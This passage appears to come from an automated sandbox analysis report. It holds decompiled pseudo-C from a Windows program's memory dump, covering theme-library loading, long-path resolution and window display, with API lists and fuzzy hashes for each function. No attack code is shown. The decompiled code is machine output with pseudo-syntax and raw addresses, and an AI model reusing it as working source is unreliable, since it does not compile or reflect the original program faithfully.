    						 *((intOrPtr*)(_t26 + 5)) =  *0x47b8a0;
    						 *0x47b8a0 = _t26;
    						_t26 = _t26 + 0xd;
    					} while (_t26 - _t35 < 0xffc);
    					 *0x47b89c = _t35;
    				}
    				_t25 =  *0x47b8a0;
    				 *0x47b8a0 =  *((intOrPtr*)(_t25 + 5));
    				 *((intOrPtr*)(_t25 + 5)) = _a4;
    				 *((intOrPtr*)(_t25 + 9)) = _a8;
    				return  *0x47b8a0;
    			}

    APIs
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A8B6
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: da2751bf1e6d8384520788fe734145a4a5e4c7a1f92e788c3d621b4f4502a7a3
    • Instruction ID: a98bfb044d1f20788cf98fbfa4edd2fcfb8e76fbf6e22a1b2e69f21d1a37deec
    • Opcode Fuzzy Hash: da2751bf1e6d8384520788fe734145a4a5e4c7a1f92e788c3d621b4f4502a7a3
    • Instruction Fuzzy Hash: 1F115A746003058BD710EF1AC881B86F7E4EF88360F10C53AE95C8B385D378E951CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 90%
    			E00424218(void* __ebx, void* __ecx) {
    				char _v5;
    				intOrPtr _t2;
    				intOrPtr _t6;
    				intOrPtr _t108;
    				intOrPtr _t111;
    
    				_t2 =  *0x47ba50; // 0x2320b80
    				E00424010(_t2);
    				_push(_t111);
    				_push(0x4245cb);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t111;
    				 *0x47ba4c =  *0x47ba4c + 1;
    				if( *0x47ba48 == 0) {
    					 *0x47ba48 = LoadLibraryA("uxtheme.dll");
    					if( *0x47ba48 > 0) {
    						 *0x47b988 = GetProcAddress( *0x47ba48, "OpenThemeData");
    						 *0x47b98c = GetProcAddress( *0x47ba48, "CloseThemeData");
    						 *0x47b990 = GetProcAddress( *0x47ba48, "DrawThemeBackground");
    						 *0x47b994 = GetProcAddress( *0x47ba48, "DrawThemeText");
    						 *0x47b998 = GetProcAddress( *0x47ba48, "GetThemeBackgroundContentRect");
    						 *0x47b99c = GetProcAddress( *0x47ba48, "GetThemeBackgroundContentRect");
    						 *0x47b9a0 = GetProcAddress( *0x47ba48, "GetThemePartSize");
    						 *0x47b9a4 = GetProcAddress( *0x47ba48, "GetThemeTextExtent");
    						 *0x47b9a8 = GetProcAddress( *0x47ba48, "GetThemeTextMetrics");
    						 *0x47b9ac = GetProcAddress( *0x47ba48, "GetThemeBackgroundRegion");
    						 *0x47b9b0 = GetProcAddress( *0x47ba48, "HitTestThemeBackground");
    						 *0x47b9b4 = GetProcAddress( *0x47ba48, "DrawThemeEdge");
    						 *0x47b9b8 = GetProcAddress( *0x47ba48, "DrawThemeIcon");
    						 *0x47b9bc = GetProcAddress( *0x47ba48, "IsThemePartDefined");
    						 *0x47b9c0 = GetProcAddress( *0x47ba48, "IsThemeBackgroundPartiallyTransparent");
    						 *0x47b9c4 = GetProcAddress( *0x47ba48, "GetThemeColor");
    						 *0x47b9c8 = GetProcAddress( *0x47ba48, "GetThemeMetric");
    						 *0x47b9cc = GetProcAddress( *0x47ba48, "GetThemeString");
    						 *0x47b9d0 = GetProcAddress( *0x47ba48, "GetThemeBool");
    						 *0x47b9d4 = GetProcAddress( *0x47ba48, "GetThemeInt");
    						 *0x47b9d8 = GetProcAddress( *0x47ba48, "GetThemeEnumValue");
    						 *0x47b9dc = GetProcAddress( *0x47ba48, "GetThemePosition");
    						 *0x47b9e0 = GetProcAddress( *0x47ba48, "GetThemeFont");
    						 *0x47b9e4 = GetProcAddress( *0x47ba48, "GetThemeRect");
    						 *0x47b9e8 = GetProcAddress( *0x47ba48, "GetThemeMargins");
    						 *0x47b9ec = GetProcAddress( *0x47ba48, "GetThemeIntList");
    						 *0x47b9f0 = GetProcAddress( *0x47ba48, "GetThemePropertyOrigin");
    						 *0x47b9f4 = GetProcAddress( *0x47ba48, "SetWindowTheme");
    						 *0x47b9f8 = GetProcAddress( *0x47ba48, "GetThemeFilename");
    						 *0x47b9fc = GetProcAddress( *0x47ba48, "GetThemeSysColor");
    						 *0x47ba00 = GetProcAddress( *0x47ba48, "GetThemeSysColorBrush");
    						 *0x47ba04 = GetProcAddress( *0x47ba48, "GetThemeSysBool");
    						 *0x47ba08 = GetProcAddress( *0x47ba48, "GetThemeSysSize");
    						 *0x47ba0c = GetProcAddress( *0x47ba48, "GetThemeSysFont");
    						 *0x47ba10 = GetProcAddress( *0x47ba48, "GetThemeSysString");
    						 *0x47ba14 = GetProcAddress( *0x47ba48, "GetThemeSysInt");
    						 *0x47ba18 = GetProcAddress( *0x47ba48, "IsThemeActive");
    						 *0x47ba1c = GetProcAddress( *0x47ba48, "IsAppThemed");
    						 *0x47ba20 = GetProcAddress( *0x47ba48, "GetWindowTheme");
    						 *0x47ba24 = GetProcAddress( *0x47ba48, "EnableThemeDialogTexture");
    						 *0x47ba28 = GetProcAddress( *0x47ba48, "IsThemeDialogTextureEnabled");
    						 *0x47ba2c = GetProcAddress( *0x47ba48, "GetThemeAppProperties");
    						 *0x47ba30 = GetProcAddress( *0x47ba48, "SetThemeAppProperties");
    						 *0x47ba34 = GetProcAddress( *0x47ba48, "GetCurrentThemeName");
    						 *0x47ba38 = GetProcAddress( *0x47ba48, "GetThemeDocumentationProperty");
    						 *0x47ba3c = GetProcAddress( *0x47ba48, "DrawThemeParentBackground");
    						 *0x47ba40 = GetProcAddress( *0x47ba48, "EnableTheming");
    					}
    				}
    				_v5 =  *0x47ba48 > 0;
    				_pop(_t108);
    				 *[fs:eax] = _t108;
    				_push(0x4245d2);
    				_t6 =  *0x47ba50; // 0x2320b80
    				return E00424018(_t6);
    			}

    APIs
    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,004245CB), ref: 0042424E
    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00424266
    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00424278
    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042428A
    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042429C
    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004242AE
    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004242C0
    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 004242D2
    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 004242E4
    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 004242F6
    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00424308
    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042431A
    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042432C
    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042433E
    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00424350
    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00424362
    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00424374
    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00424386
    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00424398
    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 004243AA
    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 004243BC
    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 004243CE
    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 004243E0
    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 004243F2
    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00424404
    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00424416
    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00424428
    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042443A
    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042444C
    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042445E
    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00424470
    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00424482
    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00424494
    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 004244A6
    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 004244B8
    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 004244CA
    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 004244DC
    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 004244EE
    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00424500
    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00424512
    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00424524
    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00424536
    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00424548
    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042455A
    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042456C
    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042457E
    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00424590
    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 004245A2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
    • API String ID: 2238633743-2910565190
    • Opcode ID: 1586025007dd4470d93438c7318bad5f77b42c0ccb86624fa12d6baefe806d8e
    • Instruction ID: 310a7ac7441a288116e4f3ed37aa7e27f37c3cb6399d08c82e25568aefbc7210
    • Opcode Fuzzy Hash: 1586025007dd4470d93438c7318bad5f77b42c0ccb86624fa12d6baefe806d8e
    • Instruction Fuzzy Hash: AFA11FF0A00660AFDB10EBB5FC86B293BE8EB45700391157AB915DF296D77C8850CB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E00405304(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char* _v20;
    				intOrPtr _v24;
    				_Unknown_base(*)()* _v28;
    				struct _WIN32_FIND_DATAA _v346;
    				char _v607;
    				char* _t75;
    				char* _t85;
    				void* _t108;
    				void* _t112;
    				struct HINSTANCE__* _t114;
    				void* _t115;
    				void* _t116;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t114 = GetModuleHandleA("kernel32.dll");
    				if(_t114 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_v20 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_v20 = E004052D8(_v8 + 2);
    							if( *_v20 != 0) {
    								_v20 = E004052D8(_v20 + 1);
    								if( *_v20 != 0) {
    									L10:
    									_t108 = _v20 - _v8;
    									_push(_t108 + 1);
    									_push(_v8);
    									_push( &_v607);
    									L00401294();
    									while( *_v20 != 0) {
    										_v24 = E004052D8(_v20 + 1);
    										_t112 = _v24 - _v20;
    										if(_t112 + _t108 + 1 <= 0x105) {
    											_push(_t112 + 1);
    											_push(_v20);
    											_push( &(( &_v607)[_t108]));
    											L00401294();
    											_t115 = FindFirstFileA( &_v607,  &_v346);
    											if(_t115 != 0xffffffff) {
    												FindClose(_t115);
    												_t75 =  &(_v346.cFileName);
    												_push(_t75);
    												L0040129C();
    												if(_t75 + _t108 + 1 + 1 <= 0x105) {
    													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
    													_push(0x105 - _t108 - 1);
    													_push( &(_v346.cFileName));
    													_push( &(( &(( &_v607)[_t108]))[1]));
    													L00401294();
    													_t85 =  &(_v346.cFileName);
    													_push(_t85);
    													L0040129C();
    													_t108 = _t108 + _t85 + 1;
    													_v20 = _v24;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v607);
    									_push(_v8);
    									L00401294();
    								}
    							}
    						}
    					}
    				} else {
    					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
    					if(_v28 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v607);
    						_push(_v8);
    						if(_v28() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v607);
    							_push(_v8);
    							L00401294();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00405321
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405332
    • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 00405366
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 004053D7
    • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 00405412
    • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 00405425
    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 00405432
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 0040543E
    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 00405472
    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 0040547E
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 004054A7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
    • String ID: GetLongPathNameA$\$kernel32.dll
    • API String ID: 3245196872-1565342463
    • Opcode ID: 0bccf53ce06912585f4d454cb0f9b45e8ddf1df6ced01e200bf397d06449fc2d
    • Instruction ID: 4abf505d0fd40480f43a9e23195c8b305344f516f0769dd65b4bf46630b09724
    • Opcode Fuzzy Hash: 0bccf53ce06912585f4d454cb0f9b45e8ddf1df6ced01e200bf397d06449fc2d
    • Instruction Fuzzy Hash: 91512871D00658AFCB11DBE8CC85AEFB7B8EF48305F1405AAA514F7281D7789E808F68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E004475DC(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
    				intOrPtr* _v8;
    				char _v12;
    				intOrPtr _t149;
    				intOrPtr _t154;
    				intOrPtr _t155;
    				intOrPtr _t160;
    				intOrPtr _t162;
    				intOrPtr _t163;
    				void* _t165;
    				struct HWND__* _t166;
    				long _t176;
    				signed int _t198;
    				signed int _t199;
    				long _t220;
    				intOrPtr _t226;
    				int _t231;
    				intOrPtr _t232;
    				intOrPtr _t241;
    				intOrPtr _t245;
    				signed int _t248;
    				intOrPtr _t251;
    				intOrPtr _t252;
    				signed int _t258;
    				long _t259;
    				intOrPtr _t262;
    				intOrPtr _t266;
    				signed int _t269;
    				intOrPtr _t270;
    				intOrPtr _t271;
    				signed int _t277;
    				long _t278;
    				intOrPtr _t281;
    				signed int _t286;
    				signed int _t287;
    				long _t290;
    				intOrPtr _t294;
    				struct HWND__* _t299;
    				signed int _t301;
    				signed int _t302;
    				signed int _t305;
    				signed int _t307;
    				long _t308;
    				signed int _t311;
    				signed int _t313;
    				long _t314;
    				signed int _t317;
    				signed int _t318;
    				signed int _t326;
    				long _t328;
    				intOrPtr _t331;
    				intOrPtr _t362;
    				long _t370;
    				void* _t372;
    				void* _t373;
    				intOrPtr _t374;
    
    				_t372 = _t373;
    				_t374 = _t373 + 0xfffffff8;
    				_v12 = 0;
    				_v8 = __eax;
    				_push(_t372);
    				_push(0x447b46);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t374;
    				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
    					_t294 =  *0x47a10c; // 0x41abf4
    					E00405DCC(_t294, 0,  &_v12);
    					E0040B61C(_v12, 1);
    					E00403BF4();
    				}
    				_t149 =  *0x47bb9c; // 0x2321704
    				E0044BC68(_t149);
    				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
    				_push(_t372);
    				_push(0x447b29);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t374;
    				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
    					_t155 = _v8;
    					_t378 =  *((char*)(_t155 + 0x1a6));
    					if( *((char*)(_t155 + 0x1a6)) == 0) {
    						_push(_t372);
    						_push(0x447a30);
    						_push( *[fs:eax]);
    						 *[fs:eax] = _t374;
    						E00403674(_v8, __eflags);
    						 *[fs:eax] = 0;
    						_t160 =  *0x47bba0; // 0x2321310
    						_t127 = _t160 + 0x6c; // 0x0
    						__eflags =  *_t127 - _v8;
    						if( *_t127 == _v8) {
    							__eflags = 0;
    							E00446788(_v8, 0);
    						}
    						_t162 = _v8;
    						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
    						if( *((char*)(_t162 + 0x22f)) != 1) {
    							_t163 = _v8;
    							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
    							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
    								_t299 = 0;
    								_t165 = E0043260C(_v8);
    								_t166 = GetActiveWindow();
    								__eflags = _t165 - _t166;
    								if(_t165 == _t166) {
    									_t176 = IsIconic(E0043260C(_v8));
    									__eflags = _t176;
    									if(_t176 == 0) {
    										_t299 = E004423CC(E0043260C(_v8));
    									}
    								}
    								__eflags = _t299;
    								if(_t299 == 0) {
    									ShowWindow(E0043260C(_v8), 0);
    								} else {
    									SetWindowPos(E0043260C(_v8), 0, 0, 0, 0, 0, 0x97);
    									SetActiveWindow(_t299);
    								}
    							} else {
    								SetWindowPos(E0043260C(_v8), 0, 0, 0, 0, 0, 0x97);
    							}
    						} else {
    							E0042FB64(_v8);
    						}
    					} else {
    						_push(_t372);
    						_push(0x447694);
    						_push( *[fs:eax]);
    						 *[fs:eax] = _t374;
    						E00403674(_v8, _t378);
    						 *[fs:eax] = 0;
    						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
    							if( *((char*)(_v8 + 0x22f)) != 1) {
    								_t301 = E00448E70() -  *(_v8 + 0x48);
    								__eflags = _t301;
    								_t302 = _t301 >> 1;
    								if(_t301 < 0) {
    									asm("adc ebx, 0x0");
    								}
    								_t198 = E00448E64() -  *(_v8 + 0x4c);
    								__eflags = _t198;
    								_t199 = _t198 >> 1;
    								if(_t198 < 0) {
    									asm("adc eax, 0x0");
    								}
    							} else {
    								_t241 =  *0x47bb9c; // 0x2321704
    								_t31 = _t241 + 0x44; // 0x0
    								_t305 = E0042B95C( *_t31) -  *(_v8 + 0x48);
    								_t302 = _t305 >> 1;
    								if(_t305 < 0) {
    									asm("adc ebx, 0x0");
    								}
    								_t245 =  *0x47bb9c; // 0x2321704
    								_t34 = _t245 + 0x44; // 0x0
    								_t248 = E0042B9A0( *_t34) -  *(_v8 + 0x4c);
    								_t199 = _t248 >> 1;
    								if(_t248 < 0) {
    									asm("adc eax, 0x0");
    								}
    							}
    							if(_t302 < 0) {
    								_t302 = 0;
    							}
    							if(_t199 < 0) {
    								_t199 = 0;
    							}
    							_t326 = _t199;
    							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
    							if( *((char*)(_v8 + 0x57)) != 0) {
    								E00445A30(_v8, _t326);
    							}
    						} else {
    							_t251 =  *((intOrPtr*)(_v8 + 0x230));
    							__eflags = _t251 + 0xfa - 2;
    							if(_t251 + 0xfa - 2 >= 0) {
    								__eflags = _t251 - 5;
    								if(_t251 == 5) {
    									_t252 = _v8;
    									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
    									if( *((char*)(_t252 + 0x22f)) != 1) {
    										_t307 = E00448EA0() -  *(_v8 + 0x48);
    										__eflags = _t307;
    										_t308 = _t307 >> 1;
    										if(_t307 < 0) {
    											asm("adc ebx, 0x0");
    										}
    										_t258 = E00448E94() -  *(_v8 + 0x4c);
    										__eflags = _t258;
    										_t259 = _t258 >> 1;
    										if(_t258 < 0) {
    											asm("adc eax, 0x0");
    										}
    									} else {
    										_t262 =  *0x47bb9c; // 0x2321704
    										_t82 = _t262 + 0x44; // 0x0
    										_t311 = E0042B95C( *_t82) -  *(_v8 + 0x48);
    										__eflags = _t311;
    										_t308 = _t311 >> 1;
    										if(_t311 < 0) {
    											asm("adc ebx, 0x0");
    										}
    										_t266 =  *0x47bb9c; // 0x2321704
    										_t85 = _t266 + 0x44; // 0x0
    										_t269 = E0042B9A0( *_t85) -  *(_v8 + 0x4c);
    										__eflags = _t269;
    										_t259 = _t269 >> 1;
    										if(_t269 < 0) {
    											asm("adc eax, 0x0");
    										}
    									}
    									__eflags = _t308;
    									if(_t308 < 0) {
    										_t308 = 0;
    										__eflags = 0;
    									}
    									__eflags = _t259;
    									if(_t259 < 0) {
    										_t259 = 0;
    										__eflags = 0;
    									}
    									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
    								}
    							} else {
    								_t270 =  *0x47bb9c; // 0x2321704
    								_t52 = _t270 + 0x44; // 0x0
    								_t370 =  *_t52;
    								_t271 = _v8;
    								__eflags =  *((char*)(_t271 + 0x230)) - 7;
    								if( *((char*)(_t271 + 0x230)) == 7) {
    									_t362 =  *0x440ce4; // 0x440d30
    									_t290 = E00403604( *(_v8 + 4), _t362);
    									__eflags = _t290;
    									if(_t290 != 0) {
    										_t370 =  *(_v8 + 4);
    									}
    								}
    								__eflags = _t370;
    								if(_t370 == 0) {
    									_t313 = E00448E70() -  *(_v8 + 0x48);
    									__eflags = _t313;
    									_t314 = _t313 >> 1;
    									if(_t313 < 0) {
    										asm("adc ebx, 0x0");
    									}
    									_t277 = E00448E64() -  *(_v8 + 0x4c);
    									__eflags = _t277;
    									_t278 = _t277 >> 1;
    									if(_t277 < 0) {
    										asm("adc eax, 0x0");
    									}
    								} else {
    									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
    									__eflags = _t317;
    									_t318 = _t317 >> 1;
    									if(_t317 < 0) {
    										asm("adc ebx, 0x0");
    									}
    									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
    									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
    									__eflags = _t286;
    									_t287 = _t286 >> 1;
    									if(_t286 < 0) {
    										asm("adc eax, 0x0");
    									}
    									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
    								}
    								__eflags = _t314;
    								if(_t314 < 0) {
    									_t314 = 0;
    									__eflags = 0;
    								}
    								__eflags = _t278;
    								if(_t278 < 0) {
    									_t278 = 0;
    									__eflags = 0;
    								}
    								_t328 = _t278;
    								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
    								_t281 = _v8;
    								__eflags =  *((char*)(_t281 + 0x57));
    								if( *((char*)(_t281 + 0x57)) != 0) {
    									E00445A30(_v8, _t328);
    								}
    							}
    						}
    						 *((char*)(_v8 + 0x230)) = 0;
    						if( *((char*)(_v8 + 0x22f)) != 1) {
    							ShowWindow(E0043260C(_v8),  *(0x479c1c + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
    						} else {
    							if( *(_v8 + 0x22b) != 2) {
    								ShowWindow(E0043260C(_v8),  *(0x479c1c + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
    								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
    								__eflags = _t220;
    								CallWindowProcA(0x406684, E0043260C(_v8), 5, 0, _t220);
    								E0042C17C();
    							} else {
    								_t231 = E0043260C(_v8);
    								_t232 =  *0x47bb9c; // 0x2321704
    								_t105 = _t232 + 0x44; // 0x0
    								SendMessageA( *( *_t105 + 0x254), 0x223, _t231, 0);
    								ShowWindow(E0043260C(_v8), 3);
    							}
    							_t226 =  *0x47bb9c; // 0x2321704
    							_t119 = _t226 + 0x44; // 0x0
    							SendMessageA( *( *_t119 + 0x254), 0x234, 0, 0);
    						}
    					}
    				}
    				_pop(_t331);
    				 *[fs:eax] = _t331;
    				_push(0x447b30);
    				_t154 = _v8;
    				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
    				return _t154;
    			}

    APIs
    • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 0044795D
      • Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: LoadMessageSendString
    • String ID: 0D
    • API String ID: 1946433856-523618118
    • Opcode ID: cfd0fa74f86a8363889c94e39ebaec32dfe22d6450ffb5d6d88c1b6367547e50
    • Instruction ID: 070d57332321567f0d22030d0b20f9c67e2048d062a29927bd93e730627b0cc6
    • Opcode Fuzzy Hash: cfd0fa74f86a8363889c94e39ebaec32dfe22d6450ffb5d6d88c1b6367547e50
    • Instruction Fuzzy Hash: DEF13E30A14244EFEB00EBA9C985F5E77F5EB04304F6544B6E504A73A2D779BE42DB48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00432878(void* __eax) {
    				void* _v28;
    				struct _WINDOWPLACEMENT _v56;
    				struct tagPOINT _v64;
    				intOrPtr _v68;
    				void* _t43;
    				struct HWND__* _t45;
    				struct tagPOINT* _t47;
    
    				_t47 =  &(_v64.y);
    				_t43 = __eax;
    				if(IsIconic( *(__eax + 0x180)) == 0) {
    					GetWindowRect( *(_t43 + 0x180), _t47);
    				} else {
    					_v56.length = 0x2c;
    					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    				}
    				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
    					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
    					if(_t45 != 0) {
    						ScreenToClient(_t45, _t47);
    						ScreenToClient(_t45,  &_v64);
    					}
    				}
    				 *(_t43 + 0x40) = _t47->x;
    				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
    				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
    				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
    				return E0042B5AC(_t43);
    			}

    APIs
    • IsIconic.USER32(?), ref: 00432887
    • GetWindowPlacement.USER32(?,0000002C), ref: 004328A4
    • GetWindowRect.USER32(?), ref: 004328BD
